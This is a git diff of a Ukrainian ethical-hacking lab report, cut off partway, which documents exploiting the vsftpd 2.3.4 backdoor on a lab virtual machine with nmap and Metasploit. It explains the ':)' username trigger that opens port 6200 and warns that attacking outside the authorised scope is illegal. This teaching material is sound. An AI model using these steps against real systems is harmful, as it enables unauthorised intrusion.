<commit_message>
feat(ethical-hacking): add third lab work
</commit_message>
<xml_diff>
--- a/Year 1/Етичний хакінг/Lab_works/Lab_report_3.docx
+++ b/Year 1/Етичний хакінг/Lab_works/Lab_report_3.docx
@@ -2320,6 +2320,65 @@
         <w:t xml:space="preserve">Команда верифікації версії сервісу:</w:t>
       </w:r>
     </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2419350"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId9" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2419350"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
     <w:tbl>
       <w:tblPr>
         <w:tblW w:type="dxa" w:w="9026"/>
@@ -2340,12 +2399,12 @@
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9026"/>
             <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
+              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
+              <w:left w:val="single" w:color="2E75B6" w:sz="18"/>
+              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
+              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
+            </w:tcBorders>
+            <w:shd w:fill="FAFCFF" w:val="clear"/>
             <w:tcMar>
               <w:top w:type="dxa" w:w="160"/>
               <w:left w:type="dxa" w:w="280"/>
@@ -2355,189 +2414,286 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="569CD6"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">kali@kali:~$ nmap -sV -p 21 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Starting Nmap 7.94 ( https://nmap.org ) at 2026-03-24 10:15 EAT</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Nmap scan report for 192.168.56.101</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Host is up (0.00051s latency).</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">PORT   STATE SERVICE VERSION</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">21/tcp open  ftp     vsftpd 2.3.4</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">MAC Address: 08:00:27:A3:9C:B1 (Oracle VirtualBox virtual NIC)</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Service Info: OS: Unix</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds</w:t>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Верифікація успішна: порт 21/tcp відкритий, сервіс ідентифіковано як vsftpd версії 2.3.4. Ця версія відповідає уразливій версії з CVE-2011-2523 (backdoor). Версія точно збігається з описом у NVD: 'vsftpd 2.3.4 downloaded between 20110630 and 20110703'. Чек-лист пункт 3 підтверджено.</w:t>
             </w:r>
           </w:p>
         </w:tc>
       </w:tr>
     </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:left w:val="single" w:color="2E75B6" w:sz="14"/>
+        </w:pBdr>
+        <w:shd w:fill="EBF3FB" w:val="clear"/>
+        <w:spacing w:after="60" w:before="180"/>
+        <w:ind w:left="120" w:right="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="2E75B6"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Завдання 2.3 — Пошук та налаштування експлойту</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:color w:val="2E75B6"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (5 балів)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="60" w:before="80"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Запуск Metasploit та пошук модуля vsftpd:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="3295650"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId10" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="3295650"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="60" w:before="100"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">show options — ДО налаштування RHOSTS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2733675"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId11" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2733675"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="60" w:before="100"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Налаштування RHOSTS та show options — ПІСЛЯ:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2667000"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId12" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2667000"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:spacing w:after="0" w:before="0"/>
@@ -2595,7 +2751,63 @@
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
               </w:rPr>
-              <w:t xml:space="preserve">Верифікація успішна: порт 21/tcp відкритий, сервіс ідентифіковано як vsftpd версії 2.3.4. Ця версія відповідає уразливій версії з CVE-2011-2523 (backdoor). Версія точно збігається з описом у NVD: 'vsftpd 2.3.4 downloaded between 20110630 and 20110703'. Чек-лист пункт 3 підтверджено.</w:t>
+              <w:t xml:space="preserve">RHOSTS (Remote Hosts) — параметр, що визначає IP-адресу або діапазон IP-адрес цільових систем для атаки. Підтримує формати: одиничний IP (192.168.56.101), CIDR-діапазон (192.168.56.0/24), файл зі списком IP.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="FAFCFF"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Наслідки неправильного RHOSTS:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">У лабораторному середовищі: спроба атаки проти неіснуючого або неправильного хосту — exploit не спрацює, втрата часу.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">У реальному пентесті: КРИТИЧНЕ порушення scope. Якщо RHOSTS вказує за межі авторизованого IP-діапазону — пентестер атакує несанкціонований хост, що є незаконним незалежно від намірів. Це може призвести до юридичної відповідальності, відмови у виплаті та дискваліфікації результатів тесту. Саме тому пункт Go/No-Go 'Ціль підтверджена' є обов’язковим.</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2632,7 +2844,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Завдання 2.3 — Пошук та налаштування експлойту</w:t>
+        <w:t xml:space="preserve">Завдання 2.4 — Виконання exploit</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2641,7 +2853,7 @@
           <w:sz w:val="22"/>
           <w:szCs w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (5 балів)</w:t>
+        <w:t xml:space="preserve"> (7 балів)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2659,17 +2871,61 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="60" w:before="80"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Запуск Metasploit та пошук модуля vsftpd:</w:t>
+        <w:spacing w:after="100" w:before="100"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5715000" cy="2609850"/>
+            <wp:effectExtent t="0" r="0" b="0" l="0"/>
+            <wp:docPr id="1" name="" descr="" title=""/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="" descr=""/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13" cstate="none"/>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5715000" cy="2609850"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:before="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:sz w:val="8"/>
+          <w:szCs w:val="8"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2692,12 +2948,12 @@
           <w:tcPr>
             <w:tcW w:type="dxa" w:w="9026"/>
             <w:tcBorders>
-              <w:top w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:left w:val="single" w:color="00FF41" w:sz="8"/>
-              <w:bottom w:val="single" w:color="00FF41" w:sz="6"/>
-              <w:right w:val="single" w:color="00FF41" w:sz="6"/>
-            </w:tcBorders>
-            <w:shd w:fill="0D1117" w:val="clear"/>
+              <w:top w:val="single" w:color="2E75B6" w:sz="1"/>
+              <w:left w:val="single" w:color="2E75B6" w:sz="18"/>
+              <w:bottom w:val="single" w:color="2E75B6" w:sz="1"/>
+              <w:right w:val="single" w:color="2E75B6" w:sz="1"/>
+            </w:tcBorders>
+            <w:shd w:fill="FAFCFF" w:val="clear"/>
             <w:tcMar>
               <w:top w:type="dxa" w:w="160"/>
               <w:left w:type="dxa" w:w="280"/>
@@ -2707,1145 +2963,72 @@
           </w:tcPr>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="569CD6"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">kali@kali:~$ msfconsole</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="1A1A1A"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Ключовий рядок 1: '[+] 192.168.56.101:21 - Backdoor service has been spawned, handling...' — підтвердження успішної активації backdoor. Сервер vsftpd 2.3.4 отримав тригер ':)' у username та відкрив backdoor-порт 6200.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:after="60" w:before="60"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:color w:val="FAFCFF"/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">                                                  </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:after="30" w:before="30"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
-                <w:color w:val="E8E8E8"/>
-                <w:sz w:val="20"/>
-                <w:szCs w:val="20"/>
-              </w:rPr>
-              <w:t xml:space="preserve">      .:okOOOkdc'           'cdkOOOko:.          </w:t>
-            </w:r>
-          </w:p>
-          <w:p>
